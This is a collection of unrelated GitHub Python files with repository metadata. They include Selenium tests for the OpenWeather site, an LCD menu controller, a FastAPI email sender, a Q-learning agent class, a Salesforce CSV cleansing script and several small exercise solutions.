ignore_index=True)\r\n\r\n\tmatrix.set_index('body', inplace=True)\r\n\treturn matrix\r\n\r\n# main\r\n\r\n# TODO - pass datafile as ARGV\r\nmatrix = parse_ephemeris(\"ephemeris-20230627.dat\")\r\nprint(matrix)\r\n","repo_name":"rmeus/planetary-aspects","sub_path":"aspect-matrix.py","file_name":"aspect-matrix.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42182749122","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver import Keys\nimport pytest\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\nfooter_website_locator = (By.CLASS_NAME, \"inner-footer-container\")\ncompany_title_locator = (By.XPATH, \"//p[@class='section-heading' and text()='Company']\")\ncompany_content_locator = (By.CSS_SELECTOR, \".footer-section > div > p\")\ngitHub_icon_image = (By.XPATH, \"//div[@class='social']//a[6]/img\")\nlogo = (By.CSS_SELECTOR, \"#first-level-nav a\")\ncopyright_locator = (By.CSS_SELECTOR, \"div.inner-footer-container div.horizontal-section.my-5 span:nth-child(3)\")\ncopyright_expected_result = ['©', '2012 — 2023', 'OpenWeather', '® All rights reserved']\nmap_info_block = (\"css selector\", 'a.map-info-block .minutely-section')\nURL = 'https://openweathermap.org/'\n#The page 'Maps' (/weathermap) doesn't include because it hasn't website footer\nPAGES = ['', 'guide', 'api', 'weather-dashboard', 'price', 'our-initiatives', 'examples', 'home/sign_in', 'faq', 'appid']\n\n\ndef test_TC_003_07_01_visibility_of_the_company_module(driver, open_and_load_main_page, wait):\n footer_website = driver.find_element(*footer_website_locator)\n driver.execute_script(\"arguments[0].scrollIntoView();\", footer_website)\n company_title = driver.find_element(*company_title_locator)\n assert company_title.is_displayed()\n content = driver.find_element(*company_content_locator)\n assert content.is_displayed()\n\n\ndef test_TC_003_10_03_visibility_of_GitHub_icon(driver, open_and_load_main_page, wait):\n footer_website = driver.find_element(*footer_website_locator)\n driver.execute_script(\"arguments[0].scrollIntoView();\", footer_website)\n github_icon = driver.find_element(*gitHub_icon_image)\n assert github_icon.is_displayed()\n\n\ndef test_TC_002_01_02_verify_returning_from_API_page_to_main_page_by_clicking_on_logo(driver, wait):\n driver.get('https://openweathermap.org/api')\n driver.find_element(*logo).click()\n assert 'https://openweathermap.org/' in driver.current_url\n\n\n@pytest.mark.parametrize('page', PAGES)\ndef test_TC_003_01_01_verify_footer_is_visible_from_all_pages_specified_in_data(driver, wait, page):\n driver.get(f'{URL}{page}')\n footer_website = driver.find_element(*footer_website_locator)\n driver.execute_script('arguments[0].scrollIntoView();', footer_website)\n # print(footer_website.is_displayed(), driver.current_url, driver.title)\n assert footer_website.is_displayed() and driver.title not in 'Page not found (404) - OpenWeatherMap', \\\n f'\\nFooter is not present on the page - {driver.current_url}'\n\n\n@pytest.mark.parametrize('page', PAGES)\ndef test_TC_003_01_02_verify_copyright_is_visible_from_all_pages_specified_in_data(driver, wait, page):\n driver.get(f'{URL}{page}')\n copyright_website = driver.find_element(*copyright_locator)\n driver.execute_script('arguments[0].scrollIntoView();', copyright_website)\n copyright_actual_result = copyright_website.text\n copyright_flag = 1\n for i in copyright_expected_result:\n if i not in copyright_actual_result:\n copyright_flag = 0\n assert copyright_website.is_displayed() and copyright_flag == 1, f'\\nCopyright is not present (actual) on the page - {driver.current_url}'\n\ndef test_TC_003_10_05_verify_visibility_of_github_icon(driver, open_and_load_main_page):\n github_icon = driver.find_element(*gitHub_icon_image)\n assert github_icon.is_displayed() and github_icon.is_enabled()\n\ndef test_TC_001_06_01_redirect_to_interactive_world_weather_map(driver, open_and_load_main_page, wait):\n driver.find_element(*map_info_block).click()\n driver.switch_to.window(driver.window_handles[1])\n wait.until(EC.title_is(\"Interactive weather maps - OpenWeatherMap\"))\n assert driver.title == \"Interactive weather maps - OpenWeatherMap\"\n\n\n\nimport time\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nURL = \"https://openweathermap.org/\"\n\n\ndef test_check_page_title(driver):\n # function checks page title\n driver.get('https://openweathermap.org')\n assert driver.title == 'Сurrent weather and forecast - OpenWeatherMap'\n\n\ndef test_should_open_given_link(driver):\n driver.get(URL)\n assert 'openweathermap' in driver.current_url\n\n\ndef test_button_search_exist(driver):\n driver.get(URL)\n btn = driver.find_element(By.XPATH, \"//button[@type='submit']\")\n assert btn.text == \"Search\"\n\n\ndef test_open_page_map(driver):\n driver.get('https://openweathermap.org/weathermap?basemap=map&cities=true&layer=temperature&lat=30&lon=-20&zoom=5')\n driver.maximize_window()\n assert \"weathermap\" in driver.current_url","repo_name":"AleksandrMax88/OpenWeatherPython","sub_path":"tests/test_group_roma.py","file_name":"test_group_roma.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12267436510","text":"POLL_TIME = 0.01\nHOLD_TIME = 1.0\nLONG_TIME = 3.0\nMENU_TIMEOUT = 5.0\nBLINK_TIME = 0.1\nSCROLL_TIME = 0.4\n\n\nimport time\nimport ssd1306\nimport OPi.GPIO as GPIO\nfrom encoder import Encoder\nfrom .hw_overlay import *\n\nif ACTIVE_HIGH:\n ACTIVE = GPIO.HIGH\nelse:\n ACTIVE = GPIO.LOW\nSTATE_NONE = 0\nSTATE_DOWN = 1\nSTATE_TAP = 2\nSTATE_HOLD = 3\nSTATE_HELD = 4\nSTATE_LONG = 5\nSTATE_LONGER = 6\n\nCHR_BSP = 0\nCHR_ENT = 1\nINPCHARS = \" abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.\\/\" + chr(CHR_BSP) + chr(CHR_ENT)\nPRNCHARS = ' !\"#$%&\\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\\\]^_`abcdefghijklmnopqrstuvwxyz{|}~' + chr(CHR_BSP) + chr(CHR_ENT)\n\nclass StompBox():\n\n def enc_left(scale_position):\n print('Encoder turned left')\n\n def enc_right(scale_position):\n print('Encoder turned right')\n\n def enc_btn(scale_position):\n print('Encoder button pressed')\n\n def __init__(self):\n\n # initialize LCD\n self.LCD = RPLCD.CharLCD(pin_rs=LCD_RS,\n pin_e=LCD_EN,\n pin_rw=None,\n pins_data=[LCD_D4, LCD_D5, LCD_D6, LCD_D7],\n numbering_mode=GPIO.BCM,\n cols=16, rows=2,\n compat_mode=True)\n self.LCD.create_char(CHR_BSP,[0,3,5,9,5,3,0,0])\n self.LCD.create_char(CHR_ENT,[0,1,5,9,31,8,4,0])\n self.lcd_clear()\n self.encoder = Encoder(CLK=1, DT=2, SW=3)\n self.encoder.setup(dec_callback=self.enc_left, inc_callback=self.enc_right, sw_callback=self.enc_btn)\n\n def lcd_clear(self):\n self.LCD.clear()\n self.scrollmsg = ''\n \n def lcd_write(self, text, row=0, col=0):\n if len(text) > 16:\n if self.scrollmsg:\n self.LCD.cursor_pos = (row, 0)\n if self.scrollpos < 0:\n self.LCD.write_string(\"%-16s\" % self.scrollmsg[:16])\n elif self.scrollpos < (len(self.scrollmsg) - 16):\n self.LCD.write_string(\"%-16s\" % self.scrollmsg[self.scrollpos:self.scrollpos+16]) \n elif self.scrollpos < (len(self.scrollmsg) - 14):\n self.LCD.write_string(\"%-16s\" % self.scrollmsg[-16:])\n else:\n self.scrollpos = -4 \n else:\n self.scrollmsg = text\n self.scrollrow = row\n self.scrollpos = -4\n self.lastscroll = time.time()\n self.LCD.cursor_pos = (row, 0)\n self.LCD.write_string(\"%-16s\" % text[:16])\n else:\n if self.scrollmsg and row == self.scrollrow:\n self.scrollmsg = ''\n self.LCD.cursor_pos = (row, col)\n self.LCD.write_string(text)\n \n \n def lcd_blink(self, text, row=0, n=3):\n while n != 0:\n self.lcd_write(' '*16, row)\n time.sleep(BLINK_TIME)\n self.lcd_write(\"%-16s\" % text, row)\n time.sleep(BLINK_TIME)\n n -= 1\n \n def choose_opt(self, opts, row=0, timeout=MENU_TIMEOUT, passlong=False):\n \"\"\"\n has the user choose from a list of choices in :opts\n returns the index of the choice\n or -1 if the user backed out or time expired\n passlong: pass STATE_LONG through to calling loop\n \"\"\"\n i=0\n while True:\n self.lcd_write(' '*16, row)\n self.lcd_write(opts[i], row)\n tstop = time.time() + timeout\n while True:\n if timeout and time.time() > tstop:\n self.lcd_write(' '*16, row)\n return -1\n self.update()\n if sum(self.state.values()) == STATE_NONE:\n continue\n elif self.state[BTN_R] == STATE_TAP:\n i=(i+1)%len(opts)\n break\n elif self.state[BTN_L] == STATE_TAP:\n i=(i-1)%len(opts)\n break\n elif self.state[BTN_R] == STATE_HOLD:\n self.lcd_blink(opts[i], row)\n return i\n elif self.state[BTN_L] == STATE_HOLD:\n self.lcd_write(' '*16, row)\n return -1\n elif STATE_LONG in self.state.values() and passlong:\n for b in self.state:\n if self.state[b] == STATE_LONG:\n self.state[b] = STATE_HELD\n return -1\n\n def choose_val(self, val, inc, minval, maxval, format=\"%16s\"):\n \"\"\"\n lets the user change a numeric parameter\n returns the user's choice on timeout\n \"\"\"\n while True:\n self.lcd_write('%16s' % (format % val), 1)\n tstop = time.time() + MENU_TIMEOUT\n while time.time() < tstop:\n self.update()\n if sum(self.state.values()) == STATE_NONE:\n continue\n if self.state[BTN_R] > STATE_DOWN:\n val = min(val + inc, maxval)\n elif self.state[BTN_L] > STATE_DOWN:\n val = max(val - inc, minval)\n break\n else:\n return val\n\n def char_input(self, text='', row=1, timeout=MENU_TIMEOUT, charset=INPCHARS):\n \"\"\"\n a way of letting the user enter a text string with two buttons\n text: the initial value of the text\n user taps buttons to choose character, holds buttons to move\n cursor right or left\n when cursor is at end of input, user can tap to\n delete or newline character\n newline returns text\n timeout returns empty string\n \"\"\"\n i = len(text)\n char = len(charset) - 1\n self.LCD.cursor_mode = 'blink'\n while True:\n if i < len(text):\n char = charset.find(text[i])\n lpos = max(i - 15, 0)\n self.lcd_write(\"%-16s\" % text[lpos:lpos + 16], row)\n if char > -1:\n self.lcd_write(charset[char], row, min(i, 15))\n self.LCD.cursor_pos = (row, min(i, 15))\n tstop = time.time() + timeout\n while time.time() < tstop:\n self.update()\n if sum(self.state.values()) == STATE_NONE:\n continue\n elif STATE_TAP in self.state.values():\n if i==len(text):\n if self.state[BTN_R] == STATE_TAP:\n char = (char + 1) % len(charset)\n else:\n char = (char - 1) % len(charset)\n else:\n if self.state[BTN_R] == STATE_TAP:\n char = (char + 1) % (len(charset) - 2)\n else:\n char = (char - 1) % (len(charset) - 2)\n if char < (len(charset) - 2):\n text = text[0:i] + charset[char] + text[i+1:]\n break\n elif self.state[BTN_R] >= STATE_HOLD:\n if self.state[BTN_R] == STATE_HELD: continue\n if char == (len(charset) - 1):\n if self.state[BTN_R] != STATE_HOLD: continue\n self.LCD.cursor_mode = 'hide'\n self.lcd_blink(text.strip()[0:16], row)\n return text.strip()\n if self.state[BTN_R] > STATE_HELD: time.sleep(BLINK_TIME)\n i = min(i + 1, len(text))\n if i == len(text):\n char = len(charset) - 1\n break\n elif self.state[BTN_L] >= STATE_HOLD:\n if self.state[BTN_L] == STATE_HELD: continue\n if char == (len(charset) - 2):\n text = text[0:max(0, i - 1)] + text[i:]\n if self.state[BTN_L] > STATE_HELD: time.sleep(BLINK_TIME)\n i = max(i - 1, 0)\n break\n else:\n self.LCD.cursor_mode = 'hide'\n return ''\n\n","repo_name":"laurence-diack/fluidpatcher","sub_path":"utils/stompboxopi.py","file_name":"stompboxopi.py","file_ext":"py","file_size_in_byte":8242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"30862424811","text":"from fastapi import BackgroundTasks, FastAPI\nfrom starlette.responses import JSONResponse\nfrom fastapi_mail import FastMail, MessageSchema, ConnectionConfig, MessageType\nfrom pydantic import EmailStr, BaseModel\nfrom typing import Any, List, Dict\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nclass EmailSchema(BaseModel):\n email: List[EmailStr]\n body: Dict[str, Any]\n\n\nconf = ConnectionConfig(\n MAIL_USERNAME = os.environ.get('MAIL_USERNAME'),\n MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD'),\n MAIL_FROM = os.environ.get('MAIL_FROM'),\n MAIL_PORT = 587,\n MAIL_SERVER = os.environ.get('MAIL_SERVER'),\n MAIL_FROM_NAME=\"Медведь Сергеевич\",\n MAIL_STARTTLS = True,\n MAIL_SSL_TLS = False,\n USE_CREDENTIALS = True,\n VALIDATE_CERTS = True,\n TEMPLATE_FOLDER = './frontend/templates',\n)\n\n\nasync def send_in_background(\n email: EmailSchema\n ) -> JSONResponse:\n html = \"\"\"

    Hi this test mail, thanks for using Fastapi-mail

    \"\"\"\n message = MessageSchema(\n subject=\"Fastapi-Mail module\",\n recipients=email.get(\"email\"),\n template_body=email.get(\"body\"),\n subtype=MessageType.html,\n )\n print(message.template_body)\n fm = FastMail(conf)\n\n await fm.send_message(message, template_name='email.html')\n\n return JSONResponse(status_code=200, content={\"message\": \"email has been sent\"})","repo_name":"mokybrow/mokybrowsite","sub_path":"api/email/send_email.py","file_name":"send_email.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15229653899","text":"class Solution:\n def diagonalSum(self, mat: List[List[int]]) -> int:\n \n order = len(mat[0])\n diagonalSum = 0\n \n if order == 1:\n return mat[0][0]\n \n for i in range(order):\n \n diagonalSum += mat[i][i] + mat[i][order - i - 1]\n \n if order % 2 == 1:\n \n diagonalSum -= mat[order // 2][order//2]\n \n \n return diagonalSum\n ","repo_name":"lsbiff/leetcode","sub_path":"1572. Matrix Diagonal Sum.py","file_name":"1572. Matrix Diagonal Sum.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38374758070","text":"import sys\nimport random\n\nimport numpy as np\n\nimport torch\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nfrom model import QNetwork\nfrom marl_utils import hard_update, soft_update, onehot_from_logits\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nFloatTensor = torch.cuda.FloatTensor if torch.cuda.is_available() else torch.FloatTensor\n\n\nclass Agent:\n \"\"\"\n Class for individual IQL agent\n \"\"\"\n\n def __init__(self, observation_size, action_size, params):\n \"\"\"\n Initialise parameters for agent\n :param observation_size: dimensions of observations\n :param action_size: dimensions of actions\n :param params: parsed arglist parameter list\n \"\"\"\n self.observation_size = observation_size\n self.action_size = action_size\n self.params = params\n\n self.epsilon = params.epsilon\n self.epsilon_anneal_slow = params.epsilon_anneal_slow\n if self.epsilon_anneal_slow:\n self.goal_epsilon = params.goal_epsilon\n self.epsilon_decay = params.epsilon_decay\n self.decay_factor = params.decay_factor\n self.current_decay = params.decay_factor\n else:\n self.decay_factor = params.decay_factor\n\n # create Q-Learning networks\n self.model = QNetwork(observation_size, action_size, params.hidden_dim)\n\n if params.seed is not None:\n random.seed(params.seed)\n np.random.seed(params.seed)\n torch.manual_seed(params.seed)\n torch.cuda.manual_seed(params.seed)\n if torch.cuda.is_available():\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n self.target_model = QNetwork(\n observation_size, action_size, params.hidden_dim\n )\n\n if params.seed is not None:\n random.seed(params.seed)\n np.random.seed(params.seed)\n torch.manual_seed(params.seed)\n torch.cuda.manual_seed(params.seed)\n if torch.cuda.is_available():\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n hard_update(self.target_model, self.model)\n\n # create optimizer\n self.optimizer = optim.Adam(self.model.parameters(), lr=params.lr)\n\n if params.seed is not None:\n random.seed(params.seed)\n np.random.seed(params.seed)\n torch.manual_seed(params.seed)\n torch.cuda.manual_seed(params.seed)\n if torch.cuda.is_available():\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n self.t_step = 0\n\n def step(self, obs, explore=False, available_actions=None):\n \"\"\"\n Take a step forward in environment for a minibatch of observations\n :param obs (PyTorch Variable): Observations for this agent\n :param explore (boolean): Whether or not to add exploration noise\n :param available_actions: binary vector (n_agents, n_actions) where each list contains\n binary values indicating whether action is applicable\n :return: action (PyTorch Variable) Actions for this agent\n \"\"\"\n qvals = self.model(obs)\n self.t_step += 1\n\n if available_actions is not None:\n assert self.discrete_actions\n available_mask = torch.ByteTensor(list(map(lambda a: a == 1, available_actions)))\n negative_tensor = torch.ones(qvals.shape) * -1e9\n negative_tensor[:, available_mask] = qvals[:, available_mask]\n qvals = negative_tensor\n if explore:\n action = onehot_from_logits(qvals, self.epsilon)\n else:\n # use small epsilon in evaluation even\n action = onehot_from_logits(qvals, 0.01)\n\n if self.epsilon_anneal_slow:\n self.current_decay *= self.decay_factor\n self.epsilon = max(0.1 + (self.epsilon_decay - self.current_decay)/ self.epsilon_decay, self.goal_epsilon)\n else:\n self.epsilon *= self.decay_factor\n\n return action\n","repo_name":"semitable/seac","sub_path":"seql/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"40"} +{"seq_id":"25279332411","text":"from typing import List, Optional\n\nfrom fastapi import HTTPException\n\nfrom database import get_list, insert_and_get_id, make_query, make_delete_query\nfrom models import tables\n\n\nclass WishListService:\n\n def get(self, user_id: int, product_id: int) -> Optional[tables.WishList]:\n return make_query(\"SELECT * FROM wish_list WHERE user_id=%s \"\n \"AND product_id=%s LIMIT 1\", tables.WishList, (user_id, product_id,))\n\n def get_list(self, user_id: int) -> List[tables.Product]:\n return get_list(\"SELECT * FROM products\"\n \" INNER JOIN wish_list w on products.id = w.product_id\"\n \" WHERE w.user_id = %s\", tables.Product, user_id)\n\n def add(self, user_id: int, product_id: int) -> int:\n if self.get(user_id, product_id):\n raise HTTPException(status_code=418, detail=\"This product has already been added\")\n query = \"INSERT INTO wish_list (user_id, product_id) \" \\\n \"VALUES (%s, %s)\"\n return insert_and_get_id(query, (user_id, product_id))\n\n def delete(self, user_id: int, product_id: int) -> tables.WishList:\n make_delete_query(\"DELETE FROM wish_list WHERE user_id=%s AND product_id=%s\",\n (user_id, product_id,))\n return tables.WishList(user_id=user_id, product_id=product_id)\n","repo_name":"polinkasosiska/jewelry_store","sub_path":"Python(create_db)/services/wish_list.py","file_name":"wish_list.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"3163306425","text":"def main():\r\n file1 = open('input.txt', 'r')\r\n numbers = dict()\r\n lst = []\r\n while True: \r\n line = file1.readline() \r\n if not line: \r\n break\r\n numbers[int(line)] = int(line)\r\n lst.append(int(line))\r\n\r\n for e in lst:\r\n if (2020 - e) in numbers:\r\n result = e * (2020 - e)\r\n print(result)\r\n return\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"florinrm/aoc-2020","sub_path":"day1/part1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12773842525","text":"#!/usr/bin/env python3\r\n\r\n# Author: krishna.r.shetty@outlook.com\r\n# Version: 2.0\r\n# 08-Oct-2018.\r\n\r\nimport pandas as pd\r\nimport random as rd\r\nimport os\r\nimport write_log as log\r\nimport datetime\r\nfrom csv import QUOTE_ALL # package to add quote for all fields in the final files.\r\nimport numpy as np # for column 7, replacing if length > 9950 and add custom text\r\n\r\n\r\n# CONFIGURATION\r\n# File containing all the pre identified HTML tags that needs to be removed before SF loading.\r\ntag_param_for_removal = r\"C:\\Users\\krishna.shetty\\PycharmProjects\\SFBLoad\\config\\parameters.txt\"\r\n\r\n# Directory that contains all source CSV files that needs to be cleansed.\r\ninput_dir = r\"C:\\sfb_load\\input\\\\\"\r\nsf_suc_file_feed_item = r\"C:\\sfb_load\\input\\sf\\sfFeedItemSuccess.csv\" #directory containing post processed SF file.\r\nsf_item_file = r\"C:\\sfb_load\\input\\sf\\FeedItem.csv\"\r\nsf_comment_file = r\"C:\\sfb_load\\input\\sf\\FeedComment.csv\"\r\n\r\n#File header (post split)\r\nitem_header = ['messageid','parentmessageid','threadid','containertype','containerid','userid','subject','body',\r\n 'rewardpoints','creationdate','modificationdate','status','isRichText','Type']\r\n\r\ncomment_header = ['messageid','parentmessageid','threadid','containertype','containerid','userid','subject',\r\n 'body','rewardpoints','creationdate','modificationdate','status','isRichText']\r\n\r\n\r\n# Directory where the cleansed, transformed files will be generated.\r\noutput_dir = r\"C:\\sfb_load\\output\\\\\" # Folder location where the split file will be stored. 2 files in total\r\n\r\n# Directory path for Log files\r\nlog_path = r\"C:\\sfb_load\\log\\\\\"\r\nlog_file = log_path + \"sfb_file_transform.\"\r\nlog_file_name = str(log_file + datetime.datetime.now().strftime('%d-%m-%y') + \".log\")\r\n\r\n#Custom file changes\r\ncustom_text = 'The original post was too long, and is attached as a text file'\r\n\r\n\r\ndef to_csv(DataFrame, FileName, Mode = 'a', header = None):\r\n '''\r\n :param DataFrame: Name of the active pandas datafrmae.\r\n :param FileName: target file name to which the dataframe will be written to.\r\n :param Mode: default mode - Append (a), unless specificed as \"write\" (w).\r\n :return: None.\r\n '''\r\n DataFrame.to_csv(path_or_buf=FileName, sep=',',\r\n na_rep='', float_format=None, columns=None, header=header, index=False,\r\n index_label=None, mode=Mode, encoding=None, compression=None, quoting=QUOTE_ALL,\r\n quotechar='\"', line_terminator='\\n', chunksize=None, tupleize_cols=None,\r\n date_format=None, doublequote=True, escapechar=None, decimal='.')\r\n print('file created : ' + FileName)\r\n\r\ndef add_header(file_name, ftype):\r\n\r\n if ftype == 'c':\r\n df_tmp = pd.read_csv(file_name, header=None)\r\n os.remove(file_name)\r\n to_csv(DataFrame=df_tmp, FileName=file_name, Mode='w', header=comment_header)\r\n elif ftype == 'i':\r\n df_tmp = pd.read_csv(file_name, header=None)\r\n to_csv(DataFrame=df_tmp, FileName=file_name, Mode='w', header=item_header)\r\n else:\r\n pass\r\n\r\n\r\ndef check_directory():\r\n '''\r\n Checks and validates if the key working directories are present.\r\n directories being validated = log and input directory.\r\n :return:None\r\n '''\r\n if os.path.isdir(log_path):\r\n pass\r\n else:\r\n os.mkdir(log_path)\r\n log.log_me(log_file_name,\"Directory \" + log_path + \" created.\")\r\n\r\n if os.path.isdir(input_dir):\r\n pass\r\n else:\r\n os.mkdir(input_dir)\r\n log.log_me(log_file_name,\"Directory \" + input_dir + \" created. However no csv files to process\")\r\n log.log_me(log_file_name, \"Terminating program..\")\r\n exit(1)\r\n\r\n if os.path.isdir(output_dir):\r\n pass\r\n else:\r\n os.mkdir(output_dir)\r\n log.log_me(log_file_name,\"Directory \" + output_dir + \" created.\")\r\n\r\n print(\"Directory check : OK\")\r\n\r\ndef modify_feed(feed_file):\r\n os.chdir(output_dir)\r\n df = pd.read_csv(feed_file)\r\n df[13] = r'QuestionPost'\r\n\r\n to_csv(df, feed_file, 'w')\r\n print(\"file modified \"+ feed_file)\r\n\r\n\r\ndef split_file(input_file, suffix):\r\n \"\"\"\r\n The file processes the input CSV file and creates the FEED and COMMENTS split.\r\n :param input_file: Name of the CSV file to be split into Feed and Comments data.\r\n :param suffix: technical parameters appended to the end of the split file. avoids overwriting.\r\n :return: None.\r\n \"\"\"\r\n print(\"Processing file : \" + input_file)\r\n file_feed = output_dir + \"FeedItem_\"\r\n file_comment = output_dir + \"FeedComment_\"\r\n\r\n try:\r\n ''' Read the input CSV file'''\r\n data = pd.read_csv(input_file, header=None, index_col=None)\r\n tot_count = str(data[0].count())\r\n\r\n #Text manipulation if length > 9950\r\n data[7] = np.where(data[7].str.len() > 9950, data[7].str.slice(0, 1000), data[7])\r\n\r\n #Date conversion\r\n data[9] = pd.to_datetime(data[9], unit='ms')\r\n data[10] = pd.to_datetime(data[10], unit='ms')\r\n data[12] = r'TRUE'\r\n\r\n #Cleanse data remove tags\r\n tags = open(tag_param_for_removal, 'r')\r\n for tag in tags:\r\n if tag[0] == '#':\r\n pass\r\n else:\r\n data = data.replace(tag.strip(), '', regex=True)\r\n tags.close()\r\n log.log_me(log_file_name, \"Tags configured in file : \" + tag_param_for_removal + \" removed.\")\r\n log.log_me(log_file_name, \"cleansing complete..\")\r\n\r\n\r\n # Splitting dataframe\r\n # Condition \"2nd field = null\" (Question)\r\n dataframe_feed = data[data[1].isnull()]\r\n dataframe_comment = data[data[1].notnull()]\r\n\r\n file_feed = file_feed + str(suffix) + \".csv\"\r\n file_comment = file_comment + str(suffix) + \".csv\"\r\n\r\n # Write back transformed file to \"csv\" format.\r\n # All parameters except \"quoting\" changed to \"QUOTE_ALL\" to match with the input quoting style.\r\n to_csv(dataframe_feed, file_feed, 'w')\r\n to_csv(dataframe_comment, file_comment, 'w')\r\n\r\n # Gather total number of lines for each of the files after split\r\n # purpose: logging.\r\n feed_count = str(dataframe_feed[0].count())\r\n comment_count = str(dataframe_comment[0].count())\r\n\r\n #Post split modifications\r\n modify_feed(file_feed)\r\n\r\n #add header\r\n add_header(file_feed, 'i')\r\n add_header(file_comment, 'c')\r\n\r\n # Logging\r\n log.log_me(log_file_name, \"Input File :\" + input_file + ' | Total record count :' + tot_count)\r\n log.log_me(log_file_name, \"File \" + file_feed + ' created | Total feed count :' + feed_count)\r\n log.log_me(log_file_name, \"File \" + file_comment + ' created | Total feed count :' + comment_count)\r\n log.log_me(log_file_name, \"----------------------------------\")\r\n print(\"File \"+ input_file +\" processed\")\r\n\r\n except Exception as e:\r\n log.log_me(log_file_name, \"Exception encountered\")\r\n log.log_me(log_file_name, e)\r\n exit(1)\r\n\r\n\r\ndef scan_files():\r\n \"\"\"\r\n Scan thought ALL files in input_directory,\r\n pick the \"csv\" files for processing (splitting).\r\n :return: Total number of files successfully processed.\r\n \"\"\"\r\n try:\r\n print(\"Initializing file processing\")\r\n counter = 0\r\n log.log_me(log_file_name, \"=================================\")\r\n log.log_me(log_file_name, \"Input Directory :\" + input_dir)\r\n log.log_me(log_file_name, \"Output Directory :\" +output_dir)\r\n log.log_me(log_file_name, \"=================================\")\r\n for file in os.listdir(input_dir):\r\n\r\n # Generate random 4 digit suffix to append to the split file name\r\n # Purpose: Avoid overwriting.\r\n suffix = rd.randint(1111, 9999)\r\n fin_inp_path = input_dir + file\r\n\r\n if file[-3:] == \"csv\":\r\n log.log_me(log_file_name, \"Processing file : \" + fin_inp_path)\r\n split_file(fin_inp_path, suffix)\r\n counter += 1\r\n else:\r\n continue\r\n return counter\r\n except Exception as e:\r\n log.log_me(log_file_name, \"Exception encountered\")\r\n log.log_me(log_file_name, e)\r\n exit(1)\r\n\r\n\r\ndef MergeAll():\r\n '''\r\n execute as follows:\r\n sfb_load.MergeAll()\r\n :return:\r\n '''\r\n os.chdir(output_dir)\r\n feed_master_file = 'feed_master_'\r\n comment_master_file = 'comment_master_'\r\n\r\n #suffix = rd.randint(1111, 9999)\r\n #suffix = '123'\r\n\r\n #fm_final = feed_master_file + str(suffix) + '.csv'\r\n #cm_final = comment_master_file + str(suffix) + '.csv'\r\n\r\n fm_final = feed_master_file + '.csv'\r\n cm_final = comment_master_file + '.csv'\r\n\r\n print(fm_final)\r\n print(cm_final)\r\n\r\n for file in os.listdir(output_dir):\r\n if file[:7] == \"FeedIte\":\r\n print('processing file : ' + file)\r\n tmp_df = pd.read_csv(file, header=None)\r\n to_csv(tmp_df, fm_final, 'a')\r\n\r\n elif file[:7] == \"FeedCom\":\r\n print('processing file : ' + file)\r\n tmp_df_cm = pd.read_csv(file, header=None)\r\n to_csv(tmp_df_cm, cm_final, 'a')\r\n else:\r\n pass\r\n\r\n\r\ndef post_load_transformation():\r\n ''' Perform post split file modification '''\r\n # read sf input csv file'''\r\n # header_modification\r\n comment_header = ['messageid', 'parentmessageid', 'threadid', 'containertype', 'containerid', 'userid', 'subject',\r\n 'body', 'rewardpoints', 'creationdate', 'modificationdate', 'status',\r\n 'isRichText','id', 'ParentThreadL0']\r\n\r\n\r\n df_sf = pd.read_csv(sf_suc_file_feed_item, encoding = \"ISO-8859-1\")\r\n df_comm = pd.read_csv(sf_comment_file, encoding = \"ISO-8859-1\")\r\n\r\n df_comm = pd.merge(df_comm, df_sf[['threadid', 'id', 'messageid']], on='threadid', how='left')\r\n to_csv(df_comm, sf_comment_file, 'w', comment_header)\r\n #df_comm.to_csv(sf_comment_file, sep=',', na_rep='', float_format=None, header=True, mode='w', index=False, index_label=None)\r\n\r\n\r\nif __name__ == '__main__':\r\n # Validate if the configured directories exist.\r\n check_directory()\r\n\r\n # Call function to scan all files (csv's) within input directory\r\n #no_of_files_processed = scan_files()\r\n #print(\"Number of files processed :\" + str(no_of_files_processed))\r\n\r\n #Merging splited files into one single file for feed and comments.\r\n #Merge_feedandcomment()\r\n\r\n #Perform post SF load transformation\r\n post_load_transformation()\r\n print('Post load transformation completed..')\r\n\r\n\r\n print(\"Processing complete..\")\r\n print(\"See log for details : \" + log_file_name)","repo_name":"KshParis/DataCleanser_CSV_SF_load","sub_path":"sfb_load.py","file_name":"sfb_load.py","file_ext":"py","file_size_in_byte":10717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17663657359","text":"# Part 3.1 (Division function)\n\ndiv_func = lambda num1, num2: num1 / num2\n\na = int(input('Делимое: '))\nb = int(input('Делитель: '))\nwhile b == 0:\n print(\"Деление на ноль! Решение невозможно.\")\n break\nelse:\n print(div_func(a, 